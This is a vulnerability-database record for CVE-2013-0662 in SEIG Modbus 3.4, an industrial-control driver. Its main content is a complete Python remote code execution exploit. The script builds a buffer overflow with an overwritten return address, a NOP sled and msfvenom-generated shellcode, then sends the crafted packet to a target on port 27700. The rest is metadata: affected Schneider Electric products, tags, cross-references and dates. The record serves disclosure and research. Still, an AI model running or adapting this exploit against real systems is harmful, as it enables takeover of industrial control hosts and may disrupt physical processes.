ID
VAR-E-201403-0101
CVE
| cve_id: | CVE-2013-0662 | Trust: 2.9 |
EDB ID
45220
TITLE
SEIG Modbus 3.4 - Remote Code Execution - Windows_x86 remote Exploit
Trust: 0.6
DESCRIPTION
SEIG Modbus 3.4 - Remote Code Execution. CVE-2013-0662 . remote exploit for Windows_x86 platform
Trust: 0.6
AFFECTED PRODUCTS
| vendor: | seig | model: | modbus | scope: | eq | version: | 3.4 | Trust: 3.8 |
| vendor: | schneider | model: | electric unity pro | scope: | eq | version: | 6.0 | Trust: 0.3 |
| vendor: | schneider | model: | electric unity pro | scope: | eq | version: | 6 | Trust: 0.3 |
| vendor: | schneider | model: | electric opc factory server | scope: | eq | version: | 3.34 | Trust: 0.3 |
| vendor: | schneider | model: | electric opc factory driver | scope: | eq | version: | 3.34 | Trust: 0.3 |
EXPLOIT
# Title: SEIG Modbus 3.4 - Remote Code Execution
# Author: Alejandro Parodi
# Date: 2018-08-17
# Vendor Homepage: https://www.schneider-electric.com
# Software Link: https://github.com/hdbreaker/Ricnar-Exploit-Solutions/tree/master/Medium/CVE-2013-0662-SEIG-Modbus-Driver-v3.34/VERSION%203.4
# Version: v3.4
# Tested on: Windows XP SP3
# CVE: CVE-2013-0662
# References:
# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0662
import socket
import struct
ip = "192.168.127.138"
port = 27700
con = (ip, port)
####### MESSAGE ##########
message_header = "\x00\x64"
message_buffer = "A" * 0x5dc
eip = struct.pack("<I", 0x7C9C167D)
# Shellcode generated with:
# msfvenom -a x86 --platform windows -p windows/exec cmd=calc -e x86/xor_call4 -f python
# Shellcode Size: 189 bytes
nopsleed = "\x90" * 100 # \x90 bad char bypass
shellcode = "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b"
shellcode += "\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7"
shellcode += "\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf"
shellcode += "\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c"
shellcode += "\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01"
shellcode += "\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31"
shellcode += "\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d"
shellcode += "\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66"
shellcode += "\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0"
shellcode += "\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f"
shellcode += "\x5f\x5a\x8b\x12\xeb\x8d\x5d\x6a\x01\x8d\x85\xb2\x00"
shellcode += "\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5"
shellcode += "\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a"
shellcode += "\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53"
shellcode += "\xff\xd5\x63\x61\x6c\x63\x00"
message = message_header + message_buffer + eip + nopsleed + shellcode
print "Message Len: " + hex(len(message)) + " bytes"
##########################
######## PKG HEADER ######
header_padding = "\x42\x42"
header_buf_size = "\xFF\xFF"
header_recv_len = struct.pack(">H", len(message))
header_end = "\x44"
header = header_padding + header_buf_size + header_recv_len + header_end
##########################
######## CRAFTING PAYLOAD ########
payload = header + message
print "Package Len: "+hex(len(payload)) + " bytes"
##################################
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(con)
s.send(payload)
Trust: 1.0
EXPLOIT LANGUAGE
py
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Remote Code Execution
Trust: 1.6
TAGS
| tag: | exploit | Trust: 1.0 |
| tag: | denial of service | Trust: 0.5 |
| tag: | remote | Trust: 0.5 |
| tag: | code execution | Trust: 0.5 |
CREDITS
Alejandro Parodi
Trust: 0.6
EXTERNAL IDS
| db: | NVD | id: | CVE-2013-0662 | Trust: 4.1 |
| db: | EXPLOIT-DB | id: | 45220 | Trust: 1.6 |
| db: | EDBNET | id: | 98952 | Trust: 0.6 |
| db: | 0DAYTODAY | id: | 30924 | Trust: 0.6 |
| db: | EDBNET | id: | 98991 | Trust: 0.6 |
| db: | 0DAYTODAY | id: | 30923 | Trust: 0.6 |
| db: | EDBNET | id: | 98990 | Trust: 0.6 |
| db: | PACKETSTORM | id: | 149000 | Trust: 0.5 |
| db: | PACKETSTORM | id: | 148995 | Trust: 0.5 |
| db: | BID | id: | 66500 | Trust: 0.3 |
REFERENCES
| url: | https://nvd.nist.gov/vuln/detail/cve-2013-0662 | Trust: 2.6 |
| url: | https://www.exploit-db.com/exploits/45220/ | Trust: 0.6 |
| url: | https://0day.today/exploits/30924 | Trust: 0.6 |
| url: | https://0day.today/exploits/30923 | Trust: 0.6 |
| url: | http://www.schneider-electric.com/site/home/index.cfm/ww/?selectcountry=true | Trust: 0.3 |
SOURCES
| db: | BID | id: | 66500 |
| db: | PACKETSTORM | id: | 149000 |
| db: | PACKETSTORM | id: | 148995 |
| db: | EXPLOIT-DB | id: | 45220 |
| db: | EDBNET | id: | 98952 |
| db: | EDBNET | id: | 98991 |
| db: | EDBNET | id: | 98990 |
LAST UPDATE DATE
2022-07-27T09:18:50.329000+00:00
SOURCES UPDATE DATE
| db: | BID | id: | 66500 | date: | 2015-03-19T09:42:00 |
SOURCES RELEASE DATE
| db: | BID | id: | 66500 | date: | 2014-03-27T00:00:00 |
| db: | PACKETSTORM | id: | 149000 | date: | 2018-08-20T16:53:07 |
| db: | PACKETSTORM | id: | 148995 | date: | 2018-08-20T16:47:30 |
| db: | EXPLOIT-DB | id: | 45220 | date: | 2018-08-20T00:00:00 |
| db: | EDBNET | id: | 98952 | date: | 2018-08-20T00:00:00 |
| db: | EDBNET | id: | 98991 | date: | 2018-08-24T00:00:00 |
| db: | EDBNET | id: | 98990 | date: | 2018-08-24T00:00:00 |